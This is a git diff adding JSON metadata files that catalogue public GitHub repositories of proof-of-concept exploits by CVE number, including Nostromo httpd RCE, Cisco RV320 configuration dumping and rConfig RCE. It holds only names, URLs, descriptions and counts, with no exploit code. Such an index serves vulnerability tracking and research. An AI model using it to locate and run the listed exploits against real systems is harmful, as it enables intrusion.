"updated_at": "2024-08-12T19:53:55Z", + "pushed_at": "2019-10-15T09:28:25Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 215297351, + "name": "CVE-2019-16278", + "full_name": "ianxtianxt\/CVE-2019-16278", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2019-16278", + "description": "CVE-2019-16278Nostromo httpd命令执行", + "fork": false, + "created_at": "2019-10-15T12:47:59Z", + "updated_at": "2024-08-12T19:53:55Z", + "pushed_at": "2020-01-11T07:25:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 217164072, + "name": "Nostromo_Python3", + "full_name": "darkerego\/Nostromo_Python3", + "owner": { + "login": "darkerego", + "id": 8583665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8583665?v=4", + "html_url": "https:\/\/github.com\/darkerego", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darkerego\/Nostromo_Python3", + "description": "CVE-2019-16278 Python3 Exploit Code", + "fork": false, + "created_at": "2019-10-23T22:24:18Z", + "updated_at": "2023-09-09T18:40:27Z", + "pushed_at": "2019-10-23T22:26:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 223463242, + "name": "CVE-2019-16278", + "full_name": "AnubisSec\/CVE-2019-16278", + "owner": { + "login": "AnubisSec", + "id": 38790814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38790814?v=4", + "html_url": "https:\/\/github.com\/AnubisSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AnubisSec\/CVE-2019-16278", + "description": "A quick python exploit for the Nostromo 1.9.6 remote code execution vulnerability. Simply takes a host and port that the web server is running on. ", + "fork": false, + "created_at": "2019-11-22T18:35:14Z", + "updated_at": "2024-08-12T19:55:06Z", + "pushed_at": "2019-11-22T18:57:29Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 224208624, + "name": "CVE-2019-16278-Nostromo_1.9.6-RCE", + "full_name": "aN0mad\/CVE-2019-16278-Nostromo_1.9.6-RCE", + "owner": { + "login": "aN0mad", + "id": 36172640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36172640?v=4", + "html_url": "https:\/\/github.com\/aN0mad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aN0mad\/CVE-2019-16278-Nostromo_1.9.6-RCE", + "description": "Python script to exploit RCE in Nostromo nhttpd <= 1.9.6.", + "fork": false, + "created_at": "2019-11-26T14:15:44Z", + "updated_at": "2024-09-05T17:01:13Z", + "pushed_at": "2019-11-26T14:26:03Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 231114950, + "name": "cve-2019-16278", + "full_name": "Kr0ff\/cve-2019-16278", + "owner": { + "login": "Kr0ff", + "id": 35173514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35173514?v=4", + "html_url": "https:\/\/github.com\/Kr0ff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kr0ff\/cve-2019-16278", + "description": "(Nhttpd) Nostromo 1.9.6 RCE due to Directory Traversal ", + "fork": false, + "created_at": "2019-12-31T16:06:13Z", + "updated_at": "2020-02-19T19:35:33Z", + "pushed_at": "2019-12-31T16:07:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 231220055, + "name": "CVE-2019-16278", + "full_name": "NHPT\/CVE-2019-16278", + "owner": { + "login": "NHPT", + "id": 42366434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42366434?v=4", + "html_url": "https:\/\/github.com\/NHPT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NHPT\/CVE-2019-16278", + "description": "CVE-2019-16278:Nostromo Web服务器的RCE漏洞", + "fork": false, + "created_at": "2020-01-01T13:28:40Z", + "updated_at": "2024-08-12T19:56:11Z", + "pushed_at": "2020-01-01T13:36:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 251251110, + "name": "cve-2019-16278", + "full_name": "keshiba\/cve-2019-16278", + "owner": { + "login": "keshiba", + "id": 62872563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62872563?v=4", + "html_url": "https:\/\/github.com\/keshiba", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keshiba\/cve-2019-16278", + "description": "Exploit for the CVE-2019-16278 vulnerability", + "fork": false, + "created_at": "2020-03-30T08:54:06Z", + "updated_at": "2022-06-24T16:41:10Z", + "pushed_at": "2022-06-24T16:41:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploits", + "httpd" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 387298591, + "name": "CVE-2019-16278", + "full_name": "n3rdh4x0r\/CVE-2019-16278", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2019-16278", + "description": null, + "fork": false, + "created_at": "2021-07-19T00:45:07Z", + "updated_at": "2024-11-18T19:18:27Z", + "pushed_at": "2024-11-18T19:18:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 473589212, + "name": "CVE-2019-16278", + "full_name": "alexander-fernandes\/CVE-2019-16278", + "owner": { + "login": "alexander-fernandes", + "id": 82245105, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82245105?v=4", + "html_url": "https:\/\/github.com\/alexander-fernandes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alexander-fernandes\/CVE-2019-16278", + "description": "A quick python exploit for the Nostromo 1.9.6 remote code execution vulnerability. Only takes in host and port of web server as required arguments.", + "fork": false, + "created_at": "2022-03-24T12:06:55Z", + "updated_at": "2022-03-24T12:25:16Z", + "pushed_at": "2022-03-24T12:25:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 636450695, + "name": "CVE-2019-16278-Nostromo-1.9.6-RCE", + "full_name": "FredBrave\/CVE-2019-16278-Nostromo-1.9.6-RCE", + "owner": { + "login": "FredBrave", + "id": 114189847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114189847?v=4", + "html_url": "https:\/\/github.com\/FredBrave", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FredBrave\/CVE-2019-16278-Nostromo-1.9.6-RCE", + "description": "This is a exploit of CVE-2019-16278 for Nostromo 1.9.6 RCE. This exploit allows RCE on the victim machine.", + "fork": false, + "created_at": "2023-05-04T21:59:23Z", + "updated_at": "2023-05-04T22:07:58Z", + "pushed_at": "2023-05-04T22:07:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 692498488, + "name": "CVE-2019-16278", + "full_name": "0xTabun\/CVE-2019-16278", + "owner": { + "login": "0xTabun", + "id": 144548207, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144548207?v=4", + "html_url": "https:\/\/github.com\/0xTabun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xTabun\/CVE-2019-16278", + "description": "Nostromo 1.9.6 reverse shell", + "fork": false, + "created_at": "2023-09-16T17:01:25Z", + "updated_at": "2023-09-16T17:01:46Z", + "pushed_at": "2023-09-16T17:09:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 886972763, + "name": "CVE-2019-16278-Nostromo-1.9.6-RCE", + "full_name": "cancela24\/CVE-2019-16278-Nostromo-1.9.6-RCE", + "owner": { + "login": "cancela24", + "id": 103641206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103641206?v=4", + "html_url": "https:\/\/github.com\/cancela24", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cancela24\/CVE-2019-16278-Nostromo-1.9.6-RCE", + "description": "This repository contains an exploit for CVE-2019-16278 in Nostromo Web Server 1.9.6, allowing remote code execution via a directory traversal vulnerability. The script uses pwntools to establish a reverse shell. For educational and authorized testing use only.", + "fork": false, + "created_at": "2024-11-12T00:13:24Z", + "updated_at": "2024-11-13T18:33:57Z", + "pushed_at": "2024-11-12T00:15:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16279.json b/2019/CVE-2019-16279.json new file mode 100644 index 0000000000..5c5c5d5fd8 --- /dev/null +++ b/2019/CVE-2019-16279.json @@ -0,0 +1,33 @@ +[ + { + "id": 215296435, + "name": "CVE-2019-16279", + "full_name": "ianxtianxt\/CVE-2019-16279", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2019-16279", + "description": "(CVE-2019-16279)dos", + "fork": false, + "created_at": "2019-10-15T12:43:28Z", + "updated_at": "2019-10-15T12:46:09Z", + "pushed_at": "2019-10-15T12:46:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16374.json b/2019/CVE-2019-16374.json new file mode 100644 index 0000000000..820a8758d9 --- /dev/null +++ b/2019/CVE-2019-16374.json @@ -0,0 +1,33 @@ +[ + { + "id": 287058442, + "name": "CVE-2019-16374", + "full_name": "IAG0110\/CVE-2019-16374", + "owner": { + "login": "IAG0110", + "id": 45686602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45686602?v=4", + "html_url": "https:\/\/github.com\/IAG0110", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IAG0110\/CVE-2019-16374", + "description": "Ldap Injection in PegaSystem 8.2 or less", + "fork": false, + "created_at": "2020-08-12T16:06:59Z", + "updated_at": "2020-08-12T16:06:59Z", + "pushed_at": "2020-08-12T16:07:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16394.json b/2019/CVE-2019-16394.json new file mode 100644 index 0000000000..87bac3b437 --- /dev/null +++ b/2019/CVE-2019-16394.json @@ -0,0 +1,33 @@ +[ + { + "id": 241264049, + "name": "Silent_CVE_2019_16394", + "full_name": "trungnd51\/Silent_CVE_2019_16394", + "owner": { + "login": "trungnd51", + "id": 33328719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33328719?v=4", + "html_url": "https:\/\/github.com\/trungnd51", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trungnd51\/Silent_CVE_2019_16394", + "description": "Simple POC for CVE-2019-16394", + "fork": false, + "created_at": "2020-02-18T03:32:00Z", + "updated_at": "2021-04-10T14:12:06Z", + "pushed_at": "2020-02-14T17:44:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16405.json b/2019/CVE-2019-16405.json new file mode 100644 index 0000000000..237f1eef5a --- /dev/null +++ b/2019/CVE-2019-16405.json @@ -0,0 +1,33 @@ +[ + { + "id": 216111903, + "name": "CVE-2019-16405.rb", + "full_name": "TheCyberGeek\/CVE-2019-16405.rb", + "owner": { + "login": "TheCyberGeek", + "id": 52138157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52138157?v=4", + "html_url": "https:\/\/github.com\/TheCyberGeek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCyberGeek\/CVE-2019-16405.rb", + "description": "Metasploit module & Python script for CVE-2019-16405", + "fork": false, + "created_at": "2019-10-18T21:50:37Z", + "updated_at": "2021-02-09T23:15:25Z", + "pushed_at": "2021-02-09T23:15:22Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16516.json b/2019/CVE-2019-16516.json new file mode 100644 index 0000000000..ae0d77b06f --- /dev/null +++ b/2019/CVE-2019-16516.json @@ -0,0 +1,33 @@ +[ + { + "id": 439465684, + "name": "ScreenConnect-UserEnum", + "full_name": "czz\/ScreenConnect-UserEnum", + "owner": { + "login": "czz", + "id": 633664, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/633664?v=4", + "html_url": "https:\/\/github.com\/czz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/czz\/ScreenConnect-UserEnum", + "description": "ConnectWise also known as ScreenConnect CVE-2019-16516", + "fork": false, + "created_at": "2021-12-17T21:34:20Z", + "updated_at": "2021-12-21T17:39:44Z", + "pushed_at": "2022-02-02T17:57:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1652.json b/2019/CVE-2019-1652.json new file mode 100644 index 0000000000..f3cf9f88ce --- /dev/null +++ b/2019/CVE-2019-1652.json @@ -0,0 +1,38 @@ +[ + { + "id": 167347037, + "name": "CiscoRV320Dump", + "full_name": "0x27\/CiscoRV320Dump", + "owner": { + "login": "0x27", + "id": 9094330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9094330?v=4", + "html_url": "https:\/\/github.com\/0x27", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x27\/CiscoRV320Dump", + "description": "CVE-2019-1652 \/CVE-2019-1653 Exploits For Dumping Cisco RV320 Configurations & Debugging Data AND Remote Root Exploit!", + "fork": false, + "created_at": "2019-01-24T10:12:44Z", + "updated_at": "2024-10-20T14:11:30Z", + "pushed_at": "2019-02-08T12:38:05Z", + "stargazers_count": 226, + "watchers_count": 226, + "has_discussions": false, + "forks_count": 65, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cisco", + "config-dump", + "exploit", + "exploitation" + ], + "visibility": "public", + "forks": 65, + "watchers": 226, + "score": 0, + "subscribers_count": 15 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1653.json b/2019/CVE-2019-1653.json new file mode 100644 index 0000000000..b66b660402 --- /dev/null +++ b/2019/CVE-2019-1653.json @@ -0,0 +1,133 @@ +[ + { + "id": 168361115, + "name": "CVE-2019-1653", + "full_name": "dubfr33\/CVE-2019-1653", + "owner": { + "login": "dubfr33", + "id": 20056018, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20056018?v=4", + "html_url": "https:\/\/github.com\/dubfr33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dubfr33\/CVE-2019-1653", + "description": "NSE script to scan for Cisco routers vulnerable to CVE-2019-1653", + "fork": false, + "created_at": "2019-01-30T14:58:48Z", + "updated_at": "2023-01-10T03:20:00Z", + "pushed_at": "2019-01-30T15:01:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 178810790, + "name": "CiscoSpill", + "full_name": "shaheemirza\/CiscoSpill", + "owner": { + "login": "shaheemirza", + "id": 4853436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4853436?v=4", + "html_url": "https:\/\/github.com\/shaheemirza", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shaheemirza\/CiscoSpill", + "description": "Just a PoC tool to extract password using CVE-2019-1653.", + "fork": false, + "created_at": "2019-04-01T07:40:01Z", + "updated_at": "2024-08-12T19:47:29Z", + "pushed_at": "2019-04-01T07:50:48Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cisco", + "exploit", + "exploitation", + "extract-passwords", + "pentest", + "securiy" + ], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 619228408, + "name": "CVE-2019-1653", + "full_name": "ibrahimzx\/CVE-2019-1653", + "owner": { + "login": "ibrahimzx", + "id": 69252640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69252640?v=4", + "html_url": "https:\/\/github.com\/ibrahimzx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ibrahimzx\/CVE-2019-1653", + "description": "A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information.", + "fork": false, + "created_at": "2023-03-26T16:36:22Z", + "updated_at": "2023-03-26T16:44:56Z", + "pushed_at": "2023-03-26T16:55:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 888565114, + "name": "nuclei-CiscoRV320Dump-CVE-2019-1653", + "full_name": "elzerjp\/nuclei-CiscoRV320Dump-CVE-2019-1653", + "owner": { + "login": "elzerjp", + "id": 58704234, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58704234?v=4", + "html_url": "https:\/\/github.com\/elzerjp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/elzerjp\/nuclei-CiscoRV320Dump-CVE-2019-1653", + "description": "CiscoRV320Dump CVE-2019-1653 - Automatition. ", + "fork": false, + "created_at": "2024-11-14T16:05:55Z", + "updated_at": "2024-11-14T16:54:38Z", + "pushed_at": "2024-11-14T16:54:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1663.json b/2019/CVE-2019-1663.json new file mode 100644 index 0000000000..e0e579dcc9 --- /dev/null +++ b/2019/CVE-2019-1663.json @@ -0,0 +1,95 @@ +[ + { + "id": 709977183, + "name": "CVE-2019-1663", + "full_name": "StealYourCode\/CVE-2019-1663", + "owner": { + "login": "StealYourCode", + "id": 90696735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90696735?v=4", + "html_url": "https:\/\/github.com\/StealYourCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/StealYourCode\/CVE-2019-1663", + "description": "Docs on the Vulnerability CVE-2019-1663 (Cisco Routers)", + "fork": false, + "created_at": "2023-10-25T18:52:47Z", + "updated_at": "2023-10-25T18:52:48Z", + "pushed_at": "2023-11-01T14:30:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 766075527, + "name": "CVE-2019-1663", + "full_name": "abrumsen\/CVE-2019-1663", + "owner": { + "login": "abrumsen", + "id": 106036263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106036263?v=4", + "html_url": "https:\/\/github.com\/abrumsen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abrumsen\/CVE-2019-1663", + "description": "Exploiting the pre-authentication code execution vulnerability found on RV130 cisco routers in 2019.", + "fork": false, + "created_at": "2024-03-02T09:15:26Z", + "updated_at": "2024-03-02T09:16:26Z", + "pushed_at": "2024-03-02T09:16:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893466554, + "name": "CVE-2019-1663-Binary-Analysis", + "full_name": "WolffCorentin\/CVE-2019-1663-Binary-Analysis", + "owner": { + "login": "WolffCorentin", + "id": 69762292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69762292?v=4", + "html_url": "https:\/\/github.com\/WolffCorentin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WolffCorentin\/CVE-2019-1663-Binary-Analysis", + "description": null, + "fork": false, + "created_at": "2024-11-24T14:23:26Z", + "updated_at": "2024-11-24T14:38:48Z", + "pushed_at": "2024-11-24T14:38:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16662.json b/2019/CVE-2019-16662.json new file mode 100644 index 0000000000..d982ee3567 --- /dev/null +++ b/2019/CVE-2019-16662.json @@ -0,0 +1,33 @@ +[ + { + "id": 220831587, + "name": "CVE-2019-16662", + "full_name": "mhaskar\/CVE-2019-16662", + "owner": { + "login": "mhaskar", + "id": 6861215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6861215?v=4", + "html_url": "https:\/\/github.com\/mhaskar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhaskar\/CVE-2019-16662", + "description": "The official exploit for rConfig 3.9.2 Pre-auth Remote Code Execution CVE-2019-16662", + "fork": false, + "created_at": "2019-11-10T18:26:25Z", + "updated_at": "2024-08-12T19:54:43Z", + "pushed_at": "2019-11-10T18:27:02Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16663.json b/2019/CVE-2019-16663.json new file mode 100644 index 0000000000..52e69294ba --- /dev/null +++ b/2019/CVE-2019-16663.json @@ -0,0 +1,33 @@ +[ + { + "id": 220831806, + "name": "CVE-2019-16663", + "full_name": "mhaskar\/CVE-2019-16663", + "owner": { + "login": "mhaskar", + "id": 6861215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6861215?v=4", + "html_url": "https:\/\/github.com\/mhaskar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhaskar\/CVE-2019-16663", + "description": "The official exploit for rConfig 3.9.2 Post-auth Remote Code Execution CVE-2019-16663", + "fork": false, + "created_at": "2019-11-10T18:28:11Z", + "updated_at": "2024-08-12T19:54:43Z", + "pushed_at": "2019-11-10T18:28:40Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16692.json b/2019/CVE-2019-16692.json new file mode 100644 index 0000000000..3a0d133b24 --- /dev/null +++ b/2019/CVE-2019-16692.json @@ -0,0 +1,33 @@ +[ + { + "id": 211323513, + "name": "CVE-2019-16692", + "full_name": "kkirsche\/CVE-2019-16692", + "owner": { + "login": "kkirsche", + "id": 947110, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/947110?v=4", + "html_url": "https:\/\/github.com\/kkirsche", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kkirsche\/CVE-2019-16692", + "description": "Exploit code for CVE-2019-16692", + "fork": false, + "created_at": "2019-09-27T13:18:00Z", + "updated_at": "2019-10-11T18:34:37Z", + "pushed_at": "2019-10-11T18:34:36Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16724.json b/2019/CVE-2019-16724.json new file mode 100644 index 0000000000..195bff958a --- /dev/null +++ b/2019/CVE-2019-16724.json @@ -0,0 +1,33 @@ +[ + { + "id": 290136759, + "name": "CVE-2019-16724", + "full_name": "nanabingies\/CVE-2019-16724", + "owner": { + "login": "nanabingies", + "id": 13157335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13157335?v=4", + "html_url": "https:\/\/github.com\/nanabingies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanabingies\/CVE-2019-16724", + "description": "Exploit for CVE-2019-16724 ", + "fork": false, + "created_at": "2020-08-25T06:47:51Z", + "updated_at": "2023-03-05T05:49:21Z", + "pushed_at": "2023-01-20T09:41:21Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16746.json b/2019/CVE-2019-16746.json new file mode 100644 index 0000000000..a610bd9214 --- /dev/null +++ b/2019/CVE-2019-16746.json @@ -0,0 +1,33 @@ +[ + { + "id": 817273911, + "name": "CVE-2019-16746", + "full_name": "uthrasri\/CVE-2019-16746", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2019-16746", + "description": null, + "fork": false, + "created_at": "2024-06-19T11:17:31Z", + "updated_at": "2024-06-19T11:23:29Z", + "pushed_at": "2024-06-19T11:23:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git 